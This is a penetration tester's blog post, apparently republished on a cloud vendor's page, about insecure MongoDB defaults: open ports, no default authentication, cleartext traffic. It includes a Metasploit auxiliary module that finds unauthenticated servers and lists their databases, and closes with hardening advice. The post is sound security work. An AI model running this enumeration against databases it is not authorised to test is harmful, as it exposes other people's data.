Mongodb - Security Weaknesses in a typical NoSQL database

本文涉及的产品
云数据库 MongoDB,独享型 2核8GB
推荐场景:
构建全方位客户视图
简介: Over the last year or so, I’ve noticed 2 ports appearing more frequently during internal penetration tests, namely 27017/tcp and 28017/tcp.

Over the last year or so, I’ve noticed 2 ports appearing more frequently during internal penetration tests, namely 27017/tcp and 28017/tcp. These can be easily missed if full port scans are not performed.

A quick service scan revealed this as ‘MongoDB’. I had heard of it before, but never really taken the time to look at it in any great detail. After a couple of hours of research, I realised this database was
coming up in the world. Looking at their Production Deployment Use Cases on MongoDB’s website , it’s being used by large corporations such as Disney, Forbes, MTV, UK Government to
name just a few.

So, it was time to fire up a test VM, and download the latest version to have a ‘play’.

For those of you not familiar with MongoDB, below are the pertinent points to bring you up-to-speed:

  • 10Gen brought out the first release in 2007, so its not that old.
  • It’s a “document-orientated” database (otherwise known as a NoSQL database). 
  • Typically, NoSQL DB’s use XML, YAML, JSON, and BSON to encode the data. MongoDB uses Binary JSON (BSON). 
  • NoSQL databases have their own terminology that is different from typical relational databases such as MSSQL and MySQL:
    • Document = Row or Record
    • Collection = Table or View
    • Field = Column
  • So, a typical NoSQL database collection (table) holds one or more “documents” (records). Each document can have one or more fields (columns).
  • It’s being used more and more in the production of agile applications i.e. quick to develop and deploy and often used in “big data” type projects. These can include banking applications and document storage as examples.

Ok, so what do you need to know to hack/test it? Its default ports are as follows:

  • 27017 - This is the default port mongod and mongos (mongo shell) instances. You can change this port with port or --port.
  • 27018 - This is the default port when running with --shardsvr  runtime operation or shardsvr setting.
  • 27019 - This is the default port when running with --configsvr runtime operation or configsvr setting.
  • 28017 - This is the default port for the web status page. This is always accessible at a port that is 1000 greater than the port determined by port.

So, playing with the most recent version from their web site, possible attack vectors I can think of are as follows (there may be more):

1)      Authentication Weakness – By default the DB installs with NO password credentials! Reading the MongoDB manual the MondoDB developers have put the onus of security entirely in the hands of the application developers and running it in a trusted environment. I thought lessons had been learnt with the older more mature RDBMS DB cousins and their historic authentication weaknesses…..its seems not.

2)      Authorization Weaknesses – Any created user has read-only access to the WHOLE  database. That essentially means that once you have a user, you have provided access by default to everything stored in the database….not the most secure.

3)      Admin Authorization Weakness – A user with access to the Admin database has read/write access to everything! There is no granularity. We already know that by default there is no Admin password, so….guess what…by default we have access to everything !

4)      Clear Text – All data is sent in the clear, so the data can be captured in an ARP Poison attack or other such MITM attack.

5)      Multiple Interfaces Weakness – By default the service will bind to ALL available interfaces….not so good if you’re installing it in a dual-homed environment ….you could essentially expose the whole database to a less trusted DMZ if you wern’t careful!

6)      No Encryption – Currently there is no data encryption.

7)      NoSQL infers it’s safer than RDBMS’s which are vulnerable to SQL Injection – Therefore it’s being deployed with this inference, assuming more security. The above shows this isn’t the case!

Certainly the times I have seen this during internal engagements, it has been installed in default mode i.e. NO PASSWORD, READ/WRITE ACCESS.

Clearly the developers using it tend to want to get a working application up and running as the priority rather than looking at the security, from my experience.

So how do you go about testing it?

There are several clients available from the mongoDB web site which include the Mongodb shell e.g. curl http://downloads.mongodb.org/linux/mongodb-linux-i686-2.2.2.tgz > mongo.tgz

This is currently 52.2MB in size.

In terms of security tools, there isn’t a lot out there at the moment. Metasploit does have a scanner:

use  auxiliary/scanner/mongodb/mongodb_login

This is good for checking passwords when authentication is enabled, but it didn’t tell me if default conditions were met i.e. the mongodb had no credentials.

Therefore, I wanted to amend the above tool to perform the following functions:

  • Finds hosts with TCP port 27017 open   
  • Checks if authentication is required or not
  • Attempt to login to Admin DB with no authentication.
  • List available databases

The metasploit script below performs the above function:

 
  

#### This file will look for MongoDB databases on the network

#### and determine if authentication is requried or not.

#### If it isn't then it will enumerate basic information from it.

#### Makes use of the Mongo Wire Protocl (MWP) on default TCP port 27017.

#### Written by: David Kirkpatrick

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Scanner

  include Msf::Exploit::Remote::Tcp

  include Msf::Auxiliary::Report

  def initialize(info={})

    super(update_info(info,

    'Name' => 'MongoDB Enum Utility',

    'Description'  => %q{

     Kirky's MongoDB Enumerator},

     References'=>

     [[ 'URL','http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol' ],[ 'URL','http://www.mongodb.org/display/DOCS/Implementing+Authentication+in+a+Driver' ]],

     'Author'       => [ 'kirky' ],

     'License'      => MSF_LICENSE

      ))

   register_options(

   [

     Opt::RPORT(27017),

     OptString.new('DB', [ true, "Database to use", "admin"])

    ], self.class)

     deregister_options('RHOST')

   end

   def run_host(ip)

     print_status("Scanning IP: #{ip.to_s}")

     begin

     connect

    print_good("MongoDB Server #{ip.to_s} alive with no authentication!!!")

    show_dbs(ip)

    rescue ::Exception => e

    print_error "MongoDB Server: #{e.to_s}"

    return

   end

  end

# Mongo Wire Protocol Packet

def show_dbs(ip)

requestID = Rex::Text.rand_text(4)

packet = "\x3f\x00\x00\x00"     #MWP message length (63)

packet << requestID             #MWP Request ID

packet << "\xff\xff\xff\xff"    #MWP responseTo

packet << "\xd4\x07\x00\x00"    #MWP Opcode 2004 (OP_QUERY)

packet << "\x00\x00\x00\x00"    #MWP OP_QUERY flags

packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\00" #fullCollectionName database=admin,collection=$cmd (admin.$cmd)

packet << "\x00\x00\x00\x00"    #MWP numberToSkip (0)

packet << "\x01\x00\x00\x00"    #MWP numberToReturn (1)

packet << "\x1c\x00\x00\x00"    #MWP Doc Length

packet << "\x01\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00"    #MWP query listDabases

sock.put(packet)

response = sock.recv(1024)

name = response.scan(/name.....(.*?)..sizeOnDisk/)

dbname = name.join(",")

print_status("List of Databases on #{ip.to_s}:- #{dbname}")

disconnect()

end

end

Given the lack of security with mongodb with the default install, basic security hardening best practices should include:

  1. Disabling the default status page – using the ‘nohttpinterface’ option to turn off the 28017 port.
  2. Use a different port – using the ‘port’ option
  3. Do not enable REST in production environments – don’t use ‘rest’ option
  4. Bind the mongodb process to only one interface/IP – using the ‘bind_ip’
  5. Don’t run mongodb daemon as root
  6. Disable anonymous access – using the ‘auth’ option
  7. Encrypt data - “To support audit requirements, you may need to encrypt data stored in MongoDB. For best results you can encrypt this data in the application layer, by encrypting the content of fields that hold secure data.”
  8. Encrypt communication – Recommended to use SSL

Trusting the security of the database entirely on the application and how well it's written will continue to be a security issue, history has shown that.

So, if you haven’t added this to your list of top attack vectors, I’d recommend starting to look for it in your port scans. At the moment, the instances I’ve seen it on the network, the majority of times it’s a totally unprotected database.

If the developers of mongodb continue to leave the onus of the security to the people using it, I guess it will continue to be an easy target! I can’t wait till they start adding commands to interact with the operating system! That will be fun! It's certainly one to keep an eye on to see how it develops. 

相关实践学习
MongoDB数据库入门
MongoDB数据库入门实验。
快速掌握 MongoDB 数据库
本课程主要讲解MongoDB数据库的基本知识,包括MongoDB数据库的安装、配置、服务的启动、数据的CRUD操作函数使用、MongoDB索引的使用(唯一索引、地理索引、过期索引、全文索引等)、MapReduce操作实现、用户管理、Java对MongoDB的操作支持(基于2.x驱动与3.x驱动的完全讲解)。 通过学习此课程,读者将具备MongoDB数据库的开发能力,并且能够使用MongoDB进行项目开发。 &nbsp; 相关的阿里云产品:云数据库 MongoDB版 云数据库MongoDB版支持ReplicaSet和Sharding两种部署架构,具备安全审计,时间点备份等多项企业能力。在互联网、物联网、游戏、金融等领域被广泛采用。 云数据库MongoDB版(ApsaraDB for MongoDB)完全兼容MongoDB协议,基于飞天分布式系统和高可靠存储引擎,提供多节点高可用架构、弹性扩容、容灾、备份回滚、性能优化等解决方案。 产品详情: https://www.aliyun.com/product/mongodb
目录
相关文章
|
存储 SQL NoSQL
基本 nosql 和 mongodb等数据库对比基本 nosql 和 mongodb等数据库对比
基本 nosql 和 mongodb等数据库对比基本 nosql 和 mongodb等数据库对比
119 0
|
2月前
|
SQL NoSQL Java
springboot操作nosql的mongodb,或者是如何在mongodb官网创建服务器并进行操作
本文介绍了如何在Spring Boot中操作NoSQL数据库MongoDB,包括在MongoDB官网创建服务器、配置Spring Boot项目、创建实体类、仓库类、服务类和控制器类,以及如何进行测试。
26 1
springboot操作nosql的mongodb,或者是如何在mongodb官网创建服务器并进行操作
|
7月前
|
JSON NoSQL MongoDB
理解Nosql数据库的mongodb
【5月更文挑战第5天】MongoDB是2009年发布的一款通用型NoSQL数据库,结合了关系模型和NoSQL的优点,适用于各种现代应用。其特点包括图形界面、数据服务、云基础设施集成(AWS, Azure, Google Cloud)。它具备全面的查询能力、ACID事务、可调整的一致性保证,并有多语言驱动及工具,可在任何地方运行。
288 4
|
2月前
|
NoSQL MongoDB 数据库
MongoDB是一个NoSQL数据库,有着多种不同的命令和操作。以下是一些常见的MongoDB命令:
一些常用的MongoDB命令,如数据库和集合的管理、数据的插入、查询、更新、删除以及聚合操作等。
36 1
|
4月前
|
存储 NoSQL 关系型数据库
MongoDB保姆级指南(上):七万字从零到进阶,助你掌握又一款强大的NoSQL!
MongoDB是数据库家族中的一员,是一款专为扩展性、高性能和高可用而设计的数据库,它可以从单节点部署扩展到大型、复杂的多数据中心架构,也能提供高性能的数据读写操作;而且提供了数据复制、无感知的故障自动选主等功能,从而实现数据节点高可用。
371 6
|
4月前
|
Java 前端开发 Spring
技术融合新潮流!Vaadin携手Spring Boot、React、Angular,引领Web开发变革,你准备好了吗?
【8月更文挑战第31天】本文探讨了Vaadin与Spring Boot、React及Angular等主流技术栈的最佳融合实践。Vaadin作为现代Java Web框架,与其他技术栈结合能更好地满足复杂应用需求。文中通过示例代码展示了如何在Spring Boot项目中集成Vaadin,以及如何在Vaadin项目中使用React和Angular组件,充分发挥各技术栈的优势,提升开发效率和用户体验。开发者可根据具体需求选择合适的技术组合。
98 0
|
4月前
|
存储 SQL NoSQL
探索数据存储的多样性:深入比较Entity Framework Core与NoSQL数据库MongoDB的特性与应用
【8月更文挑战第31天】在现代软件开发中,选择合适的数据存储方案对应用性能至关重要。本文通过对比Entity Framework Core(EF Core)和MongoDB,探讨两者的特点及适用场景。EF Core作为.NET生态中的ORM,简化了SQL数据库的交互;MongoDB则是一种灵活的NoSQL文档数据库,适合处理大量非结构化数据。两者在数据模型、查询方式及性能上各有优势,选择时需根据具体应用需求决定。理解这些差异有助于做出更合理的技术选型。
106 0
|
5月前
|
存储 NoSQL Java
使用Spring Boot和MongoDB构建NoSQL应用
使用Spring Boot和MongoDB构建NoSQL应用
|
6月前
|
存储 NoSQL 数据处理
探索MongoDB:灵活、高性能的NoSQL数据库解决方案与应用实践
探索MongoDB:灵活、高性能的NoSQL数据库解决方案与应用实践
339 1
|
5月前
|
存储 NoSQL Java
使用MongoDB实现NoSQL数据库的最佳实践
使用MongoDB实现NoSQL数据库的最佳实践